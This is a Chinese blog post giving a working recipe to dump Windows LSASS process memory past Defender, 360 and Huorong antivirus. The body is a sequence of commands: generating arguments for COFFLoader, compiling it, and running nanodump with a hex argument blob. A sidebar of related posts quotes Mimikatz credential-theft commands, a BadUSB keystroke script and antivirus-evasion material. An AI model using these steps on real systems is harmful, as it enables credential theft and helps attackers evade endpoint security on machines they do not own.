绕过Defender/360/火绒导出Lsass进程

于 2023-12-04 17:46:55 发布
阅读量373 收藏 8
点赞数 10
文章标签: 火绒安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_65550121/article/details/134790132
版权

项目地址:

https://github.com/trustedsec/COFFLoader

python3 beacon_generate.py

python3 beacon_generate.py   Beacon Argument GeneratorBeacon>addint lsass进程IDBeacon>addString output.dmpBeacon>addint 1Beacon>addint 1Beacon>addint 0Beacon>addint 1Beacon>addint 0Beacon>addint 0Beacon>addint 0Beacon>addint 0Beacon>addint 0Beacon>addint 0Beacon>addString ""Beacon>addint 0Beacon>addint 0Beacon>addint 0Beacon>addString ""Beacon>addint 0Beacon>generateb'59000000cc0200000b0000006f75747075742e646d700001000000010000000000000001000000000000000000000000000000000000000000000000000000030000002222000000000000000000000000000300000022220000000000'Beacon>

编译文件

cd COFF-master
make

落地执行:

xxxxxxxxxx COFFLoader64.exe go nanodump.x64.o 59000000cc0200000b0000006f75747075742e646d700001000000010000000000000001000000000000000000000000000000000000000000000000000000030000002222000000000000000000000000000300000022220000000000

defender:
在这里插入图片描述

0x30sec
关注
绕过360实现lsass转储
hongduilanjun的博客
04-18 969
前言 获取Windows用户的凭证信息是渗透过程中至关重要的一步。 没杀软,只要有权限想怎么读就怎么读。 有杀软,得用一些特别的技巧。 注:本机所有测试均为物理机,且为最新版AV Mimikatz直接读取Lsass进程 权限提升 privilege::debug 抓取密码 sekurlsa::logonpasswords [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-BSPqd5Xv-1650257094211)(image-20220411145456534.png
Windows权限维持方案(可过360主动防御)
jihaichen的博客
04-26 1739
Windows权限维持方案(可过360主动防御)
(转)关闭360的主动防御
weixin_30390075的博客
11-22 864
原文链接: http://jingyan.baidu.com/article/e4d08ffddb08610fd3f60d51.html 关闭360的主动防御 听语音 | 浏览:12932 | 更新:2013-11-02 10:34 1 2 3 4 5 6 分步阅读 ...
免杀360过主动防御加入白名单代码放出
08-04
免杀过掉360主动防御加入白名单代码放出 仍痛割爱的放出来 象征性的收些分吧 希望大家珍惜
Windows Defender 绕过(RTO I Lab环境实测)
0pr
12-17 1541
这篇文章尝试了一下在 PEN300 课程之外的环境里面,Windows Defender 绕过的应用效果。在 RTO Lab 中看了一下 WD 的 Exclusion 设置,并没有添加任何文件和文件夹。意味着 WD 的运行应该就是真实环境中的那样,并没有任何干预。之后,再次用相同的 Payload 在 Data Center 2022 上做了一样的测试。Cobalt Strike 生成的被检测到并删除,而我们的 Payload 健在。
从vdm文件中提取Windows Defender数据库并解压缩-C/C++开发
05-27
WDExtract从vdm文件中提取Windows Defender数据库并将其解压缩。 如果您喜欢此工具,则没有官方支持,请随时贡献力量。 Feat WDExtract从vdm文件中提取Windows Defender数据库并解压缩。 如果您喜欢此工具,则没有...
Windows Defender关闭工具
11-05
Windows Defender是Microsoft为Windows操作系统内置的一款安全防护软件,它提供了实时病毒、恶意软件和其他威胁的保护。然而,有时用户可能需要暂时或永久关闭Windows Defender,例如在安装其他防病毒软件或者进行...
【Windows】Shellcode免杀,过360火绒Defender 静态及主防
古月浪子的博客
02-17 7118
Shellcode,顾名思义是一段拿来执行的代码片段,我们可以使用Shellcode来完成我们需要的任务 弹窗的代码,可以被认为是一段Shellcode,获取某个模块的基址的代码,也可以被认为是一段Shellcode,同理,拿来干坏事的代码,也是Shellcode 如今的杀毒软件都拥有查杀病毒木马的能力,除了静态的查杀,还有动态的主动防御,若恶意代码片段(拿来干坏事的Shellcode)被杀软发现,则可以认为当前运行的程序是病毒木马或是被感染的文件,理应“杀掉” 有些时候,我们不想让自己写的代码被杀毒软件当
关闭Windows Defender Service工具
最新发布
05-05
Windows Defender是微软为Windows操作系统内置的一款安全防护软件,主要用于防止病毒、间谍软件和其他恶意软件的侵害。它包括实时保护、扫描、防火墙以及账户保护等功能。然而,在某些情况下,用户可能需要暂时或...
过主动防御的免杀经验(简单易懂)
07-14
我介绍的几种方法思路独特,不同于网上的那些复杂的手段
360云查杀代码[思路不错]
04-04
此代码写的还不错,我改动了某些部分,思路写的很不错, 推荐大家下载看下,懂得了思路以后自己去写就方便的多了, 当然现在技术推陈出新很快,代码只是针对360云查杀9.0以前的版本进行测试。
如何利用DLL注入绕过火绒360主动防御写入扇区?
ceeyourbac的博客
12-15 4106
前言 由于我自己是一个系统安全爱好者,之前下载了一个能覆写所有扇区的病毒源码,我以为火绒可以保护我的扇区,我就傻乎乎的调试运行了,然后火绒把mbr写入拦截了,我以为没有任何问题了,已重启,哦,Missing Operating System。 在痛失电脑之后,我一直在想病毒是如何做到火绒报警了但是还是写入了扇区?后来我简单分析了源码之后,我看到了这样的一段代码 int WINAPI WinMain(HINSTANCE hInstance,HINSTANCE hPrevInstance,LPSTR l
badusb示例代码可绕过360
OKAY_TC的博客
10-16 3222
绕过360版本代码: void setup() { // putpower shell your setup code here, to run once Keyboard.begin();//开始键盘通讯 delay(3000);//延时 Keyboard.press(KEY_LEFT_GUI);//win键 delay(500); Keyboard.press('r');//...
360护心镜脚本分析及N种绕过方式
weixin_34023982的博客
03-08 280
tig3r · 2015/11/24 10:570x00 初识“护心镜”官方介绍:通过Hook XSS的常用函数,并监控DOM元素的创建,从而对整个页面的js行为进行监控。当发现页面中存在XSS攻击行为时,可根据预置的选项,进行放行,提醒用户选择,阻拦三种处理方式,同时预警中心会收到一次事件的告警,安全人员可根据告警进行应急响应处理。在研究如何绕过一个系统之前,不急于直接读代码,先旁敲侧击看看这个...
简单免杀过火绒360极速版
摔不死的笨鸟的博客
03-03 1957
免杀
如何利用十行代码,绕过杀毒软件实现免杀?
zqf_office的专栏
04-04 2100
我原本打算写一篇冗长的博客讲述针对不同杀毒软件的绕过技术,但当我开始着手写教程的第一章并上传样本到 virustotal 后,我震惊了!样本得到了 0/56 的检测率。于是我决定扔掉先前的长篇大论,转而记录这个快速、令人难以置信的简单方法。 我相信大部分的读者都会同意这个观点,绕过大部分杀毒软件的基本方法都很平常没什么特殊的。然而,我也偶尔会遇到一些人仅仅依靠工具生成二进制文件,这些
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值